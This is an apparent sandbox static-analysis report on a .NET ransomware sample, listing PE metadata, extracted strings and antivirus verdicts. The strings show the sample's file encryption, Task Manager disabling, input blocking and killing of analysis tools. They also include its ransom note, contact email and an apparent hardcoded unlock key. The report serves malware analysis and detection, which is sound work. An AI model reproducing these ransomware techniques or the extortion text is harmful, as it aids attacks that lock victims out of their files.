Static | ZeroBOX

PE Compile Time

2071-06-16 10:25:59

PDB Path

C:\Users\daanujs\Downloads\Ransomware_source_code-master\Rasomware2.0\Rasomware2.0\obj\Debug\Rasomware2.0.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000cc948 0x000cca00 3.15484476223
.rsrc 0x000d0000 0x00001040 0x00001200 4.78495614005
.reloc 0x000d2000 0x0000000c 0x00000200 0.0980041756627

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000d0090 0x0000033c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000d03dc 0x00000c60 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Rasomware2.0
Rasomware2._0
<>9__6_0
<Ransomware2_Load>b__6_0
<>c__DisplayClass6_0
<Ransomware2_Load>b__1
IEnumerable`1
label1
button1
pictureBox1
Microsoft.Win32
User32
ToInt32
Func`2
Ransomware2
label2
pictureBox2
label3
DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
SHA256
get_UTF8
<Module>
<PrivateImplementationDetails>
SW_HIDE
System.IO
set_IV
SW_SHOW
mscorlib
System.Collections.Generic
Ransomware2_Load
add_Load
RijndaelManaged
add_TextChanged
codebox_TextChanged
set_Enabled
bytesToBeDecrypted
bytesToBeEncrypted
fileEncrypted
Synchronized
get_Hand
RegistryValueKind
password
defaultInstance
tmr_hide
set_Mode
set_AutoScaleMode
set_SizeMode
PictureBoxSizeMode
CryptoStreamMode
CipherMode
set_Image
GetEnvironmentVariable
Enumerable
IDisposable
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
get_MainWindowHandle
DecryptionFile
EncryptionFile
DecryptFile
EncryptFile
set_FormBorderStyle
set_FlatStyle
FontStyle
set_Name
get_ProcessName
GetProcessesByName
DateTime
startTime
Combine
LocalMachine
System.Core
get_Culture
set_Culture
resourceCulture
ButtonBase
ApplicationSettingsBase
Dispose
FreezeMouse
Thawouse
Create
EditorBrowsableState
Delete
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
Rasomware2.0.exe
set_Size
get_BlockSize
set_BlockSize
set_AutoSize
set_ClientSize
get_KeySize
set_KeySize
ISupportInitialize
tmr_if
Encoding
System.Runtime.Versioning
ToString
GetString
Ransomware2_FormClosing
add_FormClosing
disposing
System.Drawing
ComputeHash
GetFolderPath
get_Black
add_Tick
tmr_hide_Tick
tmr_if_Tick
tmr_clock_Tick
tmr_encrypt_Tick
tmr_show_Tick
button1_Click
add_Click
tmr_clock
set_Interval
set_Cancel
System.ComponentModel
user32.dll
ContainerControl
CryptoStream
MemoryStream
Program
System
SymmetricAlgorithm
HashAlgorithm
ICryptoTransform
resourceMan
TimeSpan
set_TextAlign
set_Icon
set_ShowIcon
MessageBoxIcon
Application
set_Location
System.Configuration
System.Globalization
op_Subtraction
System.Reflection
ControlCollection
set_StartPosition
FormStartPosition
SearchOption
CoreDecryption
CoreEncryption
Button
get_No
FileInfo
CultureInfo
FileSystemInfo
get_Help
set_TabStop
System.Linq
set_ShowInTaskbar
SpecialFolder
sender
get_ResourceManager
ComponentResourceManager
FormClosingEventHandler
System.CodeDom.Compiler
IContainer
CurrentUser
set_ForeColor
set_BackColor
set_UseVisualStyleBackColor
set_Cursor
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Rasomware2._0.Ransomware2.resources
Rasomware2._0.Properties.Resources.resources
DebuggingModes
Rasomware2._0.Properties
EnumerateFiles
GetFiles
EnableVisualStyles
GetProcesses
get_Attributes
FileAttributes
FromMinutes
passwordBytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
GetBytes
Settings
FormClosingEventArgs
CancelEventArgs
<>4__this
get_Controls
System.Windows.Forms
set_AutoScaleDimensions
MessageBoxButtons
RuntimeHelpers
Cursors
Process
components
Concat
GetObject
EndInit
BeginInit
GraphicsUnit
get_Default
SetCompatibleTextRenderingDefault
DialogResult
HorizontalAlignment
ContentAlignment
Environment
InitializeComponent
set_Font
AES_Decrypt
OFF_Encrypt
AES_Encrypt
Start_Encrypt
tmr_encrypt
set_TopMost
SuspendLayout
ResumeLayout
PerformLayout
BlockInput
System.Text
get_Text
set_Text
get_Now
ShowWindow
nCmdShow
tmr_show
get_Yellow
set_TabIndex
MessageBox
PictureBox
set_MinimizeBox
set_MaximizeBox
TextBox
codebox
InitializeArray
ToArray
set_Key
CreateSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
Directory
Registry
set_Opacity
op_Equality
WrapNonExceptionThrows
Rasomware2.0
Copyright
2020
$7085cee3-7cca-47e8-ac84-1bad1454800c
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ahSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADPBj
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
=----------------DJS - FILES----------------=
=--------------------------------=
OMG.... All your Documents, Pictures, Videos, Music and others
have been encrypt!!
=--------------------------------=
A key is required for decryption, which you can purchase via
this contact email
" djsfilesid@gmail.com "
=--------------------------------=
=----------------WARNING----------------=
1. Do not turn off the computer
2. Do not turn on Task Manager
3. Don't try to kill this
4. Don't try to break your password without paying
5. Do not try to open encrypted files
=--------------------------------=A
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\daanujs\Downloads\Ransomware_source_code-master\Rasomware2.0\Rasomware2.0\obj\Debug\Rasomware2.0.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableTaskMgr
Control Panel\Desktop
Wallpaper
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\desktop.ini
USERPROFILE
Downloads
regedit
Processhacker
Ransomware2.0
shutdown
/r /t 0
Incorrect key
WRONG KEY
danujagadsatriaid088215940150
The key is correct
UNLOCKED
explorer.exe
Rasomware2.0
pictureBox1.Image
pictureBox1
pictureBox2.Image
pictureBox2
Microsoft Sans Serif
Georgia
label1
label1.Text
codebox
Consolas
button1
Gadugi
label2
00:00:00
Franklin Gothic Medium
label3
ENTER KEY DECRYPT
$this.Icon
Ransomware2
DJS-FILES
Rasomware2._0.Properties.Resources
hh\:mm\:ss
$this.Icon
label1.Text
pictureBox1.Image
pictureBox2.Image
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Rasomware2.0
FileVersion
1.0.0.0
InternalName
Rasomware2.0.exe
LegalCopyright
Copyright
2020
LegalTrademarks
OriginalFilename
Rasomware2.0.exe
ProductName
Rasomware2.0
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Variadic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Heur.Variadic.A.175.1
CMC Clean
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
McAfee GenericRXMN-BV!7D17A868ABAC
Malwarebytes Ransom.FileCryptor
VIPRE Clean
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Ransom:MSIL/FileCryptor.715e52f7
K7GW Trojan ( 0057146f1 )
K7AntiVirus Trojan ( 0057146f1 )
Baidu Clean
Cyren W32/MSIL_Ransom.G.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Filecoder.ACE
APEX Malicious
Paloalto generic.ml
ClamAV Win.Ransomware.Razy-9830003-0
Kaspersky HEUR:Trojan-Ransom.MSIL.Encoder.gen
BitDefender Gen:Heur.Variadic.A.175.1
NANO-Antivirus Clean
ViRobot Clean
Tencent Win32.Trojan.Variadic.Ahyl
Ad-Aware Gen:Heur.Variadic.A.175.1
Sophos Mal/Generic-R + Mal/Cryptear-A
Comodo Clean
F-Secure Clean
DrWeb Trojan.Encoder.32644
Zillya Clean
TrendMicro Ransom.MSIL.CRYPTOLOCKER.SM.hp
McAfee-GW-Edition GenericRXMN-BV!7D17A868ABAC
FireEye Gen:Heur.Variadic.A.175.1
Emsisoft Trojan.FileCoder (A)
Ikarus Trojan-Ransom.FileCrypter
GData Gen:Heur.Variadic.A.175.1
Jiangmin Clean
Webroot Clean
Avira HEUR/AGEN.1142625
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Ransom.Win32.Filecoder.sd!ni
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Ransom:MSIL/FileCryptor.AG!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.RL_Ransom.C4212291
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34170.Zm0@aiq10jj
ALYac Gen:Heur.Variadic.A.175.1
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Ransom.Clownic/MSIL!1.D862 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_98%
Fortinet MSIL/Filecoder.C81A!tr.ransom
AVG Win32:TrojanX-gen [Trj]
Avast Win32:TrojanX-gen [Trj]
MaxSecure Trojan.Malware.121218.susgen
No IRMA results available.